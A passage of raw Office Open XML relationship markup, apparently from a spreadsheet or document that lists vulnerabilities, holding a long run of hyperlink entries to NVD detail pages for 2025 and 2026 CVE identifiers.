TargetMode="External" Id="rId1292" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72964" TargetMode="External" Id="rId1293" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72966" TargetMode="External" Id="rId1294" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73004" TargetMode="External" Id="rId1295" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73008" TargetMode="External" Id="rId1296" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77488" TargetMode="External" Id="rId1297" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77491" TargetMode="External" Id="rId1298" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77492" TargetMode="External" Id="rId1299" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78454" TargetMode="External" Id="rId1300" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78506" TargetMode="External" Id="rId1301" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78513" TargetMode="External" Id="rId1302" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79910" TargetMode="External" Id="rId1303" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80160" TargetMode="External" Id="rId1304" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80162" TargetMode="External" Id="rId1305" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81387" TargetMode="External" Id="rId1306" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81390" TargetMode="External" Id="rId1307" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81391" TargetMode="External" Id="rId1308" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81392" TargetMode="External" Id="rId1309" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81393" TargetMode="External" Id="rId1310" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81394" TargetMode="External" Id="rId1311" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81395" TargetMode="External" Id="rId1312" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81399" TargetMode="External" Id="rId1313" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81400" TargetMode="External" Id="rId1314" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81401" TargetMode="External" Id="rId1315" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81958" TargetMode="External" Id="rId1316" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81977" TargetMode="External" Id="rId1317" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81978" TargetMode="External" Id="rId1318" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81982" TargetMode="External" Id="rId1319" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81984" TargetMode="External" Id="rId1320" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81991" TargetMode="External" Id="rId1321" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81993" TargetMode="External" Id="rId1322" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82001" TargetMode="External" Id="rId1323" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83501" TargetMode="External" Id="rId1324" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83949" TargetMode="External" Id="rId1325" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83951" TargetMode="External" Id="rId1326" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83991" TargetMode="External" Id="rId1327" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85875" TargetMode="External" Id="rId1328" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86084" TargetMode="External" Id="rId1329" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86511" TargetMode="External" Id="rId1330" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86513" TargetMode="External" Id="rId1331" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86519" TargetMode="External" Id="rId1332" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86665" TargetMode="External" Id="rId1333" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86666" TargetMode="External" Id="rId1334" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86669" TargetMode="External" Id="rId1335" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86672" TargetMode="External" Id="rId1336" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86673" TargetMode="External" Id="rId1337" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86716" TargetMode="External" Id="rId1338" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86808" TargetMode="External" Id="rId1339" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64542" TargetMode="External" Id="rId1340" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64584" TargetMode="External" Id="rId1341" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64588" TargetMode="External" Id="rId1342" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64589" TargetMode="External" Id="rId1343" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64610" TargetMode="External" Id="rId1344" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64618" TargetMode="External" Id="rId1345" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64830" TargetMode="External" Id="rId1346" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64838" TargetMode="External" Id="rId1347" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64854" TargetMode="External" Id="rId1348" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64866" TargetMode="External" Id="rId1349" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64868" TargetMode="External" Id="rId1350" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19479" TargetMode="External" Id="rId1351" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19612" TargetMode="External" Id="rId1352" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19644" TargetMode="External" Id="rId1353" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19713" TargetMode="External" Id="rId1354" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-2520" TargetMode="External" Id="rId1355" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27227" TargetMode="External" Id="rId1356" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52307" TargetMode="External" Id="rId1357" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69402" TargetMode="External" Id="rId1358" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69417" TargetMode="External" Id="rId1359" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69690" TargetMode="External" Id="rId1360" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71356" TargetMode="External" Id="rId1361" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71357" TargetMode="External" Id="rId1362" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71388" TargetMode="External" Id="rId1363" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71440" TargetMode="External" Id="rId1364" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71565" TargetMode="External" Id="rId1365" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72626" TargetMode="External" Id="rId1366" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72627" TargetMode="External" Id="rId1367" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75629" TargetMode="External" Id="rId1368" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75635" TargetMode="External" Id="rId1369" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75636" TargetMode="External" Id="rId1370" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75637" TargetMode="External" Id="rId1371" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75639" TargetMode="External" Id="rId1372" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75640" TargetMode="External" Id="rId1373" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75642" TargetMode="External" Id="rId1374" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75643" TargetMode="External" Id="rId1375" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75644" TargetMode="External" Id="rId1376" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75646" TargetMode="External" Id="rId1377" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75647" TargetMode="External" Id="rId1378" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75651" TargetMode="External" Id="rId1379" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75652" TargetMode="External" Id="rId1380" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75657" TargetMode="External" Id="rId1381" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75659" TargetMode="External" Id="rId1382" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75660" TargetMode="External" Id="rId1383" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75661" TargetMode="External" Id="rId1384" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75666" TargetMode="External" Id="rId1385" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75667" TargetMode="External" Id="rId1386" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75668" TargetMode="External" Id="rId1387" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75669" TargetMode="External" Id="rId1388" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75670" TargetMode="External" Id="rId1389" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75671" TargetMode="External" Id="rId1390" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75672" TargetMode="External" Id="rId1391" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75674" TargetMode="External" Id="rId1392" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75675" TargetMode="External" Id="rId1393" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75677" TargetMode="External" Id="rId1394" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75678" TargetMode="External" Id="rId1395" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75679" TargetMode="External" Id="rId1396" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75680" TargetMode="External" Id="rId1397" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75681" TargetMode="External" Id="rId1398" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75683" TargetMode="External" Id="rId1399" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75685" TargetMode="External" Id="rId1400" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75687" TargetMode="External" Id="rId1401" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75690" TargetMode="External" Id="rId1402" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75691" TargetMode="External" Id="rId1403" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75692" TargetMode="External" Id="rId1404" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75693" TargetMode="External" Id="rId1405" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75694" TargetMode="External" Id="rId1406" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75695" TargetMode="External" Id="rId1407" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75696" TargetMode="External" Id="rId1408" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75700" TargetMode="External" Id="rId1409" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75701" TargetMode="External" Id="rId1410" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75702" TargetMode="External" Id="rId1411" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75704" TargetMode="External" Id="rId1412" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75705" TargetMode="External" Id="rId1413" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75706" TargetMode="External" Id="rId1414" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75707" TargetMode="External" Id="rId1415" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75708" TargetMode="External" Id="rId1416" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75709" TargetMode="External" Id="rId1417" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75710" TargetMode="External" Id="rId1418" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75711" TargetMode="External" Id="rId1419" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75712" TargetMode="External" Id="rId1420" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75713" TargetMode="External" Id="rId1421" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75714" TargetMode="External" Id="rId1422" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75715" TargetMode="External" Id="rId1423" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75716" TargetMode="External" Id="rId1424" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75717" TargetMode="External" Id="rId1425" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75718" TargetMode="External" Id="rId1426" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75719" TargetMode="External" Id="rId1427" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75720" TargetMode="External" Id="rId1428" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75722" TargetMode="External" Id="rId1429" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75724" TargetMode="External" Id="rId1430" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75725" TargetMode="External" Id="rId1431" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75727" TargetMode="External" Id="rId1432" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75729" TargetMode="External" Id="rId1433" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75730" TargetMode="External" Id="rId1434" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75731" TargetMode="External" Id="rId1435" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75733" TargetMode="External" Id="rId1436" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75734" TargetMode="External" Id="rId1437" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75735" TargetMode="External" Id="rId1438" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75736" TargetMode="External" Id="rId1439" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75737" TargetMode="External" Id="rId1440" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75738" TargetMode="External" Id="rId1441" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75739" TargetMode="External" Id="rId1442" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75740" TargetMode="External" Id="rId1443" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75741" TargetMode="External" Id="rId1444" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75742" TargetMode="External" Id="rId1445" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79905" TargetMode="External" Id="rId1446" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84385" TargetMode="External" Id="rId1447" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86996" TargetMode="External" Id="rId1448" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12962" TargetMode="External" Id="rId1449" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19614" TargetMode="External" Id="rId1450" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19625" TargetMode="External" Id="rId1451" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33389" TargetMode="External" Id="rId1452" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33391" TargetMode="External" Id="rId1453" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47680" TargetMode="External" Id="rId1454" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70575" TargetMode="External" Id="rId1455" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77132" TargetMode="External" Id="rId1456" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 